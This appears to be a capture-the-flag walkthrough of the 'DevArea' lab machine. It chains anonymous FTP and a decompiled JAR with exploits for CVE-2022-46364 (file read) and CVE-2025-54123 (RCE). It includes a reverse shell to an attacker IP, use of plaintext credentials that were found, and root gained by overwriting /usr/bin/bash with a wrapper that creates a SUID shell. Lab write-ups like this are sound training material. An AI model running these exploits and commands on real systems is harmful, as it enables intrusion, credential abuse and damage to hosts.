Overview
DevArea is a medium Linux box and there is a LOT going on. The attack chain starts with anonymous FTP exposing a Java service JAR — which we decompile to find an Apache CXF SOAP endpoint vulnerable to SSRF. We abuse that file read to dig out a HoverFly systemd service file with credentials hardcoded right in the command line, log into the dashboard, and exploit a separate RCE CVE to land a shell. Privilege escalation is a satisfying one: we replace /usr/bin/bash with a malicious wrapper that a root-owned syswatch script blissfully executes, handing us a SUID shell.
Reconnaissance
nmap -sS -Pn -sC -sV -O 10.129.19.139
21/tcp open ftp vsftpd 3.0.5 (anonymous login allowed)
22/tcp open ssh OpenSSH 9.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.58 (redirects to devarea.htb)
8080/tcp open http Jetty 9.4.27.v20200227 (404)
8500/tcp open ? Proxy server (HoverFly proxy endpoint)
8888/tcp open http HoverFly Dashboard
Six ports, each telling its own little story. FTP with anonymous login is the obvious first stop. The Jetty 404 on 8080 suggests something is deployed but not broadcasting itself. Ports 8500 and 8888 are both HoverFly — a proxy tool with a web dashboard. We’ll be seeing a lot of that later.
First, add the hostname to the hosts file:
sudo nano /etc/hosts
# Add: 10.129.19.139 devarea.htb
Anonymous FTP
ftp 10.129.19.139
# User: anonymous / Pass: anonymous
ftp> cd pub
ftp> ls -la
-rw-r--r-- employee-service.jar
ftp> get employee-service.jar
A Java archive sitting in a public FTP share with zero authentication required. Let’s see what’s hiding inside.
JAR Decompilation and CVE-2022-46364
Decompiling with CFR:
wget https://www.benf.org/other/cfr/cfr-0.152.jar
mkdir decompiled
java -jar cfr-0.152.jar employee-service.jar --outputdir decompiled
Digging through the decompiled source, htb/devarea/ServerStarter.java is immediately interesting:
factory.setServiceClass(EmployeeService.class);
factory.setAddress("http://0.0.0.0:8080/employeeservice");
factory.create();
System.out.println("WSDL available at http://localhost:8080/employeeservice?wsdl");
The JAR bundles an Apache CXF SOAP service running on Jetty 9.4.27 — that explains the 404 on port 8080. A quick search on the CXF version confirms it’s vulnerable to CVE-2022-46364, and honestly it’s a great one.
This vulnerability abuses XOP Include elements inside MTOM multipart SOAP requests. Old CXF versions resolve XOP Include URIs server-side without validating the URI scheme, meaning we can pass file:// paths and have the server read arbitrary local files and embed the contents right back in the response. Completely unauthenticated SSRF with arbitrary file read. Beautiful.
Using the public PoC:
git clone https://github.com/kasem545/CVE-2022-46364-Poc.git
cd CVE-2022-46364-Poc
python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/passwd -d devarea.htb
/etc/passwd comes back and we spot a user called dev_ryan. I tried to be cheeky and read the user flag directly, but no luck — no permissions yet. On to bigger things.
Credential Discovery via File Read
HoverFly is clearly running given ports 8500 and 8888. Time to use our file read to go hunting for its config. A few common paths come up empty before we hit gold:
# Not found
python3 CVE-2022-46364.py ... -s file:///etc/hoverfly/hoverfly.json
python3 CVE-2022-46364.py ... -s file:///etc/hoverfly/config.json
# Bingo!
python3 CVE-2022-46364.py ... -s file:///etc/systemd/system/hoverfly.service
The systemd service file comes back and the credentials are just sitting there in the ExecStart line — in cleartext, in a service file, readable via an unauthenticated SSRF. Classic.
[Service]
User=dev_ryan
Group=dev_ryan
WorkingDirectory=/opt/HoverFly
ExecStart=/opt/HoverFly/hoverfly -add -username admin -password O7IJ27MyyXiU -listen-on-host 0.0.0.0
Credentials: admin:O7IJ27MyyXiU
HoverFly RCE via CVE-2025-54123
Logging into the HoverFly dashboard at http://devarea.htb:8888 with those credentials works first try. The dashboard immediately gives away the version: v1.11.3.
A quick search confirms this version is vulnerable to CVE-2025-54123, an RCE via the middleware API endpoint. Things are moving nicely.
git clone https://github.com/davidzzo23/CVE-2025-54123
cd CVE-2025-54123
# Sanity check first
python3 CVE-2025-54123.py -u admin -p O7IJ27MyyXiU \
-t "http://devarea.htb:8888/api/v2/hoverfly/middleware" \
-c whoami
Command execution confirmed. Time to upgrade that to a proper shell.
Start a listener:
nc -lvnp 4444
Fire it:
python3 CVE-2025-54123.py -u admin -p O7IJ27MyyXiU \
-t "http://devarea.htb:8888/api/v2/hoverfly/middleware" \
-r 10.10.14.45 4444
Shell lands as dev_ryan. Grab the user flag at /home/dev_ryan/user.txt.
Stabilise the shell so we can actually work comfortably:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
# Enter
export TERM=xterm
Privilege Escalation
Trying to wget LinPEAS directly from the box doesn’t work, so we host it ourselves:
# On attack machine
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
python3 -m http.server 8080
# On target
wget http://10.10.14.45:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinPEAS surfaces two things worth noting: a syswatch.zip in the home directory, and a script at /opt/syswatch/syswatch.sh that can be run via sudo. The key detail: the script calls /usr/bin/bash internally. If we replace /usr/bin/bash with our own wrapper and then trigger syswatch via sudo, root will execute our code. Simple, elegant, destructive.
Step 1 — Back up the real bash binary:
cp /usr/bin/bash /tmp/bash.bak
chmod +x /tmp/bash.bak
Step 2 — Drop into sh and free bash before overwriting it:
We need to get out of bash first so nothing is holding the binary open when we replace it. If bash is still running, the OS won’t let us overwrite it cleanly.
sh
killall bash
# Confirm nothing is still holding /usr/bin/bash open
lsof /usr/bin/bash
# No output? We're clear. Still seeing processes? Force it:
killall -9 bash
Step 3 — Drop in our malicious wrapper:
cat > /usr/bin/bash << 'EOF'
#!/tmp/bash.bak
cp /tmp/bash.bak /tmp/pwned
chmod 4755 /tmp/pwned
EOF
Step 4 — Trigger syswatch and let root do the work:
sudo /opt/syswatch/syswatch.sh status
Step 5 — Pop the SUID shell:
ls -la /tmp/pwned
# -rwsr-xr-x 1 root root ... /tmp/pwned
/tmp/pwned -p
whoami
# root
Root flag is at /root/root.txt. Easiest root once you see it.
Attack Chain Summary
| Step | Detail |
|---|---|
| Recon | nmap → FTP anon login, Jetty 8080, HoverFly 8888 |
| FTP | Anonymous login → employee-service.jar |
| Decompile | CFR → Apache CXF SOAP endpoint on port 8080 |
| SSRF | CVE-2022-46364 XOP Include file read → /etc/passwd, /etc/systemd/system/hoverfly.service |
| Creds | HoverFly service file → admin:O7IJ27MyyXiU hardcoded in ExecStart |
| RCE | CVE-2025-54123 HoverFly middleware API → shell as dev_ryan |
| User flag | /home/dev_ryan/user.txt |
| Privesc | Replace /usr/bin/bash, trigger syswatch sudo script → SUID bash copy |
| Root flag | /root/root.txt |